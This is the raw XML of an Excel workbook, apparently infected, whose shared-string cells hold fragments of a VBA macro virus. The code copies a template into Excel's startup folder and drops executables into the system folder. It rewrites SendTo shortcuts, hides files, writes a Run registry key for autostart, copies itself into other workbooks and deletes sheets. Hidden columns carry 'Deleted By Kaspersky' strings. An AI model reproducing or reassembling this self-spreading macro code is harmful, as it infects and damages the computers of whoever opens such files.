    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t>End Sub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</si>
</sst>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000"/>
    <numFmt numFmtId="189" formatCode="&quot;是&quot;;&quot;是&quot;;&quot;否&quot;"/>
    <numFmt numFmtId="190" formatCode="&quot;真&quot;;&quot;真&quot;;&quot;假&quot;"/>
    <numFmt numFmtId="191" formatCode="&quot;开&quot;;&quot;开&quot;;&quot;关&quot;"/>
  </numFmts>
  <fonts count="9">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>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vertical="center"/>
      <protection/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="42">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="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right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="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vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="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right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="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0" xfId="16">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="21">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="16" applyNumberFormat="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="0" xfId="16" applyNumberFormat="1" applyFont="1">
      <alignment/>
      <protection/>
    </xf>
  </cellXfs>
  <cellStyles count="8">
    <cellStyle name="Normal" xfId="0"/>
    <cellStyle name="Percent" xfId="15"/>
    <cellStyle name="常规_norma1" xfId="16"/>
    <cellStyle name="Currency" xfId="17"/>
    <cellStyle name="Currency [0]" xfId="18"/>
    <cellStyle name="Comma" xfId="19"/>
    <cellStyle name="Comma [0]" xfId="20"/>
    <cellStyle name="样式 1"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142"/>
  <sheetViews>
    <sheetView showFormulas="1" defaultGridColor="0" colorId="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="F1" sqref="A1:F16384"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="19.25390625" style="38" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" style="39" customWidth="1"/>
    <col min="3" max="3" width="31.875" style="40" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="0" style="38" hidden="1" customWidth="1"/>
    <col min="7" max="16384" width="9.00390625" style="38" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="14.25">
      <c r="A1" s="38">
        <f>"Deleted By Kaspersk"</f>
        <v>0</v>
      </c>
      <c r="B1" s="39" t="s">
        <v>127</v>
      </c>
      <c r="C1" s="40" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="14.25">
      <c r="A2" s="38" t="b">
        <f>"Deleted By Kaspersky L"</f>
        <v>0</v>
      </c>
      <c r="B2" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C2" s="40" t="s">
        <v>533</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="15.75">
      <c r="A3" s="38">
        <f>"Deleted By"</f>
        <v>9</v>
      </c>
      <c r="B3" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C3" s="41" t="s">
        <v>534</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="14.25">
      <c r="A4" s="38" t="b">
        <f>""</f>
        <v>1</v>
      </c>
      <c r="B4" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C4" s="40" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="5" spans="1:3" ht="14.25">
      <c r="A5" s="38">
        <f>"Delet"</f>
        <v>0</v>
      </c>
      <c r="B5" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C5" s="40" t="s">
        <v>536</v>
      </c>
    </row>
    <row r="6" spans="1:3" ht="14.25">
      <c r="A6" s="38" t="b">
        <f>"Deleted By Kaspe"</f>
        <v>1</v>
      </c>
      <c r="B6" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C6" s="40" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="14.25">
      <c r="A7" s="38">
        <f>"Deleted By Kaspersk"</f>
        <v>0</v>
      </c>
      <c r="B7" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C7" s="40" t="s">
        <v>538</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="14.25">
      <c r="A8" s="38" t="b">
        <f>"D"</f>
        <v>1</v>
      </c>
      <c r="B8" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C8" s="40" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="9" spans="2:3" ht="14.25">
      <c r="B9" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C9" s="40" t="s">
        <v>540</v>
      </c>
    </row>
    <row r="10" spans="2:3" ht="15.75">
      <c r="B10" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C10" s="41" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="11" spans="2:3" ht="15.75">
      <c r="B11" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C11" s="41" t="s">
        <v>542</v>
      </c>
    </row>
    <row r="12" spans="2:3" ht="15.75">
      <c r="B12" s="39" t="s">
        <v>128</v>
      </c>
      <c r="C12" s="41" t="s">
        <v>543</v>
      </c>
    </row>
    <row r="13" spans="2:3" ht="14.25">
      <c r="B13" s="39" t="s">
        <v>129</v>
      </c>
      <c r="C13" s="40" t="s">
        <v>544</v>
      </c>
    </row>
    <row r="14" spans="2:3" ht="15.75">
      <c r="B14" s="39" t="s">
        <v>130</v>
      </c>
      <c r="C14" s="41" t="s">
        <v>540</v>
      </c>
    </row>
    <row r="15" spans="2:3" ht="15.75">
      <c r="B15" s="39" t="s">
        <v>131</v>
      </c>
      <c r="C15" s="41" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="16" spans="2:3" ht="15.75">
      <c r="B16" s="39" t="s">
        <v>132</v>
      </c>
      <c r="C16" s="41" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="17" spans="2:3" ht="15.75">
      <c r="B17" s="39" t="s">
        <v>133</v>
      </c>
      <c r="C17" s="41" t="s">
        <v>546</v>
      </c>
    </row>
    <row r="18" spans="2:3" ht="15.75">
      <c r="B18" s="39" t="s">
        <v>134</v>
      </c>
      <c r="C18" s="41" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="19" spans="2:3" ht="15.75">
      <c r="B19" s="39" t="s">
        <v>108</v>
      </c>
      <c r="C19" s="41" t="s">
        <v>540</v>
      </c>
    </row>
    <row r="20" spans="2:3" ht="15.75">
      <c r="B20" s="39" t="s">
        <v>109</v>
      </c>
      <c r="C20" s="41" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="21" spans="2:3" ht="14.25">
      <c r="B21" s="39" t="s">
        <v>110</v>
      </c>
      <c r="C21" s="40" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="22" spans="2:3" ht="14.25">
      <c r="B22" s="39" t="s">
        <v>111</v>
      </c>
      <c r="C22" s="40" t="s">
        <v>549</v>
      </c>
    </row>
    <row r="23" spans="2:3" ht="15.75">
      <c r="B23" s="39" t="s">
        <v>112</v>
      </c>
      <c r="C23" s="41" t="s">
        <v>550</v>
      </c>
    </row>
    <row r="24" spans="2:3" ht="15.75">
      <c r="B24" s="39" t="s">
        <v>113</v>
      </c>
      <c r="C24" s="41" t="s">
        <v>551</v>
      </c>
    </row>
    <row r="25" spans="2:3" ht="14.25">
      <c r="B25" s="39" t="s">
        <v>114</v>
      </c>
      <c r="C25" s="40" t="s">
        <v>552</v>
      </c>
    </row>
    <row r="26" spans="2:3" ht="15.75">
      <c r="B26" s="39" t="s">
        <v>115</v>
      </c>
      <c r="C26" s="41" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="27" spans="2:3" ht="15.75">
      <c r="B27" s="39" t="s">
        <v>116</v>
      </c>
      <c r="C27" s="41" t="s">
        <v>554</v>
      </c>
    </row>
    <row r="28" spans="2:3" ht="15.75">
      <c r="B28" s="39" t="s">
        <v>117</v>
      </c>
      <c r="C28" s="41" t="s">
        <v>555</v>
      </c>
    </row>
    <row r="29" spans="2:3" ht="15.75">
      <c r="B29" s="39" t="s">
        <v>118</v>
      </c>
      <c r="C29" s="41" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="30" spans="2:3" ht="15.75">
      <c r="B30" s="39" t="s">
        <v>119</v>
      </c>
      <c r="C30" s="41" t="s">
        <v>557</v>
      </c>
    </row>
    <row r="31" spans="2:3" ht="15.75">
      <c r="B31" s="39" t="s">
        <v>120</v>
      </c>
      <c r="C31" s="41" t="s">
        <v>558</v>
      </c>
    </row>
    <row r="32" spans="2:3" ht="15.75">
      <c r="B32" s="39" t="s">
        <v>121</v>
      </c>
      <c r="C32" s="41" t="s">
        <v>559</v>
      </c>
    </row>
    <row r="33" spans="2:3" ht="15.75">
      <c r="B33" s="39" t="s">
        <v>122</v>
      </c>
      <c r="C33" s="41" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="34" spans="2:3" ht="15.75">
      <c r="B34" s="39" t="s">
        <v>123</v>
      </c>
      <c r="C34" s="41" t="s">
        <v>561</v>
      </c>
    </row>
    <row r="35" spans="2:3" ht="14.25">
      <c r="B35" s="39" t="s">
        <v>92</v>
      </c>
      <c r="C35" s="40" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="36" spans="2:3" ht="15.75">
      <c r="B36" s="39" t="s">
        <v>93</v>
      </c>
      <c r="C36" s="41" t="s">
        <v>562</v>
      </c>
    </row>
    <row r="37" spans="2:3" ht="14.25">
      <c r="B37" s="39" t="s">
        <v>94</v>
      </c>
      <c r="C37" s="40" t="s">
        <v>563</v>
      </c>
    </row>
    <row r="38" spans="2:3" ht="14.25">
      <c r="B38" s="39" t="s">
        <v>95</v>
      </c>
      <c r="C38" s="40" t="s">
        <v>564</v>
      </c>
    </row>
    <row r="39" spans="2:3" ht="14.25">
      <c r="B39" s="39" t="s">
        <v>96</v>
      </c>
      <c r="C39" s="40" t="s">
        <v>565</v>
      </c>
    </row>
    <row r="40" spans="2:3" ht="14.25">
      <c r="B40" s="39" t="s">
        <v>97</v>
      </c>
      <c r="C40" s="40" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="41" spans="2:3" ht="14.25">
      <c r="B41" s="39" t="s">
        <v>98</v>
      </c>
      <c r="C41" s="40" t="s">
        <v>567</v>
      </c>
    </row>
    <row r="42" spans="2:3" ht="14.25">
      <c r="B42" s="39" t="s">
        <v>99</v>
      </c>
      <c r="C42" s="40" t="s">
        <v>568</v>
      </c>
    </row>
    <row r="43" spans="2:3" ht="15.75">
      <c r="B43" s="39" t="s">
        <v>100</v>
      </c>
      <c r="C43" s="41" t="s">
        <v>569</v>
      </c>
    </row>
    <row r="44" spans="2:3" ht="15.75">
      <c r="B44" s="39" t="s">
        <v>101</v>
      </c>
      <c r="C44" s="41" t="s">
        <v>570</v>
      </c>
    </row>
    <row r="45" spans="2:3" ht="15.75">
      <c r="B45" s="39" t="s">
        <v>102</v>
      </c>
      <c r="C45" s="41" t="s">
        <v>571</v>
      </c>
    </row>
    <row r="46" spans="2:3" ht="14.25">
      <c r="B46" s="39" t="s">
        <v>103</v>
      </c>
      <c r="C46" s="40" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="47" spans="2:3" ht="14.25">
      <c r="B47" s="39" t="s">
        <v>104</v>
      </c>
      <c r="C47" s="40" t="s">
        <v>573</v>
      </c>
    </row>
    <row r="48" spans="2:3" ht="14.25">
      <c r="B48" s="39" t="s">
        <v>105</v>
      </c>
      <c r="C48" s="40" t="s">
        <v>574</v>
      </c>
    </row>
    <row r="49" spans="2:3" ht="14.25">
      <c r="B49" s="39" t="s">
        <v>106</v>
      </c>
      <c r="C49" s="40" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="50" spans="2:3" ht="14.25">
      <c r="B50" s="39" t="s">
        <v>107</v>
      </c>
      <c r="C50" s="40" t="s">
        <v>576</v>
      </c>
    </row>
    <row r="51" spans="2:3" ht="15.75">
      <c r="B51" s="39" t="s">
        <v>76</v>
      </c>
      <c r="C51" s="41" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="52" spans="2:3" ht="15.75">
      <c r="B52" s="39" t="s">
        <v>77</v>
      </c>
      <c r="C52" s="40" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="53" spans="2:3" ht="15.75">
      <c r="B53" s="39" t="s">
        <v>78</v>
      </c>
      <c r="C53" s="41" t="s">
        <v>577</v>
      </c>
    </row>
    <row r="54" spans="2:3" ht="15.75">
      <c r="B54" s="39" t="s">
        <v>79</v>
      </c>
      <c r="C54" s="41" t="s">
        <v>578</v>
      </c>
    </row>
    <row r="55" spans="2:3" ht="15.75">
      <c r="B55" s="39" t="s">
        <v>80</v>
      </c>
      <c r="C55" s="41" t="s">
        <v>579</v>
      </c>
    </row>
    <row r="56" spans="2:3" ht="15.75">
      <c r="B56" s="39" t="s">
        <v>81</v>
      </c>
      <c r="C56" s="41" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="57" spans="2:3" ht="15.75">
      <c r="B57" s="39" t="s">
        <v>82</v>
      </c>
      <c r="C57" s="41" t="s">
        <v>581</v>
      </c>
    </row>
    <row r="58" spans="2:3" ht="15.75">
      <c r="B58" s="39" t="s">
        <v>83</v>
      </c>
      <c r="C58" s="41" t="s">
        <v>582</v>
      </c>
    </row>
    <row r="59" spans="2:3" ht="15.75">
      <c r="B59" s="39" t="s">
        <v>84</v>
      </c>
      <c r="C59" s="41" t="s">
        <v>583</v>
      </c>
    </row>
    <row r="60" spans="2:3" ht="15.75">
      <c r="B60" s="39" t="s">
        <v>85</v>
      </c>
      <c r="C60" s="41" t="s">
        <v>584</v>
      </c>
    </row>
    <row r="61" spans="2:3" ht="15.75">
      <c r="B61" s="39" t="s">
        <v>86</v>
      </c>
      <c r="C61" s="41" t="s">
        <v>585</v>
      </c>
    </row>
    <row r="62" spans="2:3" ht="15.75">
      <c r="B62" s="39" t="s">
        <v>87</v>
      </c>
      <c r="C62" s="41" t="s">
        <v>586</v>
      </c>
    </row>
    <row r="63" spans="2:3" ht="14.25">
      <c r="B63" s="39" t="s">
        <v>88</v>
      </c>
      <c r="C63" s="40" t="s">
        <v>587</v>
      </c>
    </row>
    <row r="64" spans="2:3" ht="14.25">
      <c r="B64" s="39" t="s">
        <v>89</v>
      </c>
      <c r="C64" s="40" t="s">
        <v>588</v>
      </c>
    </row>
    <row r="65" spans="2:3" ht="14.25">
      <c r="B65" s="39" t="s">
        <v>90</v>
      </c>
      <c r="C65" s="40" t="s">
        <v>589</v>
      </c>
    </row>
    <row r="66" spans="2:3" ht="14.25">
      <c r="B66" s="39" t="s">
        <v>91</v>
      </c>
      <c r="C66" s="40" t="s">
        <v>590</v>
      </c>
    </row>
    <row r="67" spans="2:3" ht="14.25">
      <c r="B67" s="39" t="s">
        <v>60</v>
      </c>
      <c r="C67" s="40" t="s">
        <v>540</v>
      </c>
    </row>
    <row r="68" spans="2:3" ht="15.75">
      <c r="B68" s="39" t="s">
        <v>61</v>
      </c>
      <c r="C68" s="41" t="s">
        <v>591</v>
      </c>
    </row>
    <row r="69" spans="2:3" ht="15.75">
      <c r="B69" s="39" t="s">
        <v>62</v>
      </c>
      <c r="C69" s="41" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="70" spans="2:3" ht="15.75">
      <c r="B70" s="39" t="s">
        <v>63</v>
      </c>
      <c r="C70" s="41" t="s">
        <v>593</v>
      </c>
    </row>
    <row r="71" spans="2:3" ht="15.75">
      <c r="B71" s="39" t="s">
        <v>64</v>
      </c>
      <c r="C71" s="41" t="s">
        <v>594</v>
      </c>
    </row>
    <row r="72" spans="2:3" ht="15.75">
      <c r="B72" s="39" t="s">
        <v>65</v>
      </c>
      <c r="C72" s="41" t="s">
        <v>595</v>
      </c>
    </row>
    <row r="73" spans="2:3" ht="15.75">
      <c r="B73" s="39" t="s">
        <v>66</v>
      </c>
      <c r="C73" s="41" t="s">
        <v>596</v>
      </c>
    </row>
    <row r="74" spans="2:3" ht="14.25">
      <c r="B74" s="39" t="s">
        <v>67</v>
      </c>
      <c r="C74" s="40" t="s">
        <v>597</v>
      </c>
    </row>
    <row r="75" spans="2:3" ht="15.75">
      <c r="B75" s="39" t="s">
        <v>68</v>
      </c>
      <c r="C75" s="41" t="s">
        <v>598</v>
      </c>
    </row>
    <row r="76" spans="2:3" ht="15.75">
      <c r="B76" s="39" t="s">
        <v>69</v>
      </c>
      <c r="C76" s="41" t="s">
        <v>126</v>
      </c>
    </row>
    <row r="77" spans="2:3" ht="14.25">
      <c r="B77" s="39" t="s">
        <v>70</v>
      </c>
      <c r="C77" s="40" t="s">
        <v>599</v>
      </c>
    </row>
    <row r="78" spans="2:3" ht="15.75">
      <c r="B78" s="39" t="s">
        <v>71</v>
      </c>
      <c r="C78" s="41" t="s">
        <v>581</v>
      </c>
    </row>
    <row r="79" spans="2:3" ht="15.75">
      <c r="B79" s="39" t="s">
        <v>72</v>
      </c>
      <c r="C79" s="41" t="s">
        <v>582</v>
      </c>
    </row>
    <row r="80" spans="2:3" ht="14.25">
      <c r="B80" s="39" t="s">
        <v>73</v>
      </c>
      <c r="C80" s="40" t="s">
        <v>600</v>
      </c>
    </row>
    <row r="81" spans="2:3" ht="15.75">
      <c r="B81" s="39" t="s">
        <v>74</v>
      </c>
      <c r="C81" s="41" t="s">
        <v>601</v>
      </c>
    </row>
    <row r="82" spans="2:3" ht="14.25">
      <c r="B82" s="39" t="s">
        <v>75</v>
      </c>
      <c r="C82" s="40" t="s">
        <v>602</v>
      </c>
    </row>
    <row r="83" ht="14.25">
      <c r="B83" s="39" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="84" ht="14.25">
      <c r="B84" s="39" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="85" ht="14.25">
      <c r="B85" s="39" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="86" ht="14.25">
      <c r="B86" s="39" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="87" ht="14.25">
      <c r="B87" s="39" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="88" ht="14.25">
      <c r="B88" s="39" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="89" ht="14.25">
      <c r="B89" s="39" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="90" ht="14.25">
      <c r="B90" s="39" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="91" ht="14.25">
      <c r="B91" s="39" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="92" ht="14.25">
      <c r="B92" s="39" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="93" ht="14.25">
      <c r="B93" s="39" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="94" ht="14.25">
      <c r="B94" s="39" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="95" ht="14.25">
      <c r="B95" s="39" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="96" ht="14.25">
      <c r="B96" s="39" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="97" ht="14.25">
      <c r="B97" s="39" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="98" ht="14.25">
      <c r="B98" s="39" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="99" ht="14.25">
      <c r="B99" s="39" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="100" ht="14.25">
      <c r="B100" s="39" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="101" ht="14.25">
      <c r="B101" s="39" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="102" ht="14.25">
      <c r="B102" s="39" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="103" ht="14.25">
      <c r="B103" s="39" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="104" ht="14.25">
      <c r="B104" s="39" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="105" ht="14.25">
      <c r="B105" s="39" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="106" ht="14.25">
      <c r="B106" s="39" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="107" ht="14.25">
      <c r="B107" s="39" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="108" ht="14.25">
      <c r="B108" s="39" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="109" ht="14.25">
      <c r="B109" s="39" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="110" ht="14.25">
      <c r="B110" s="39" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="111" ht="14.25">
      <c r="B111" s="39" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="112" ht="14.25">
      <c r="B112" s="39" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="113" ht="14.25">
      <c r="B113" s="39" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="114" ht="14.25">
      <c r="B114" s="39" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="115" ht="14.25">
      <c r="B115" s="39" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="116" ht="14.25">
      <c r="B116" s="39" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="117" ht="14.25">
      <c r="B117" s="39" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="118" ht="14.25">
      <c r="B118" s="39" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="119" ht="14.25">
      <c r="B119" s="39" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="120" ht="14.25">
      <c r="B120" s="39" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="121" ht="14.25">
      <c r="B121" s="39" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="122" ht="14.25">
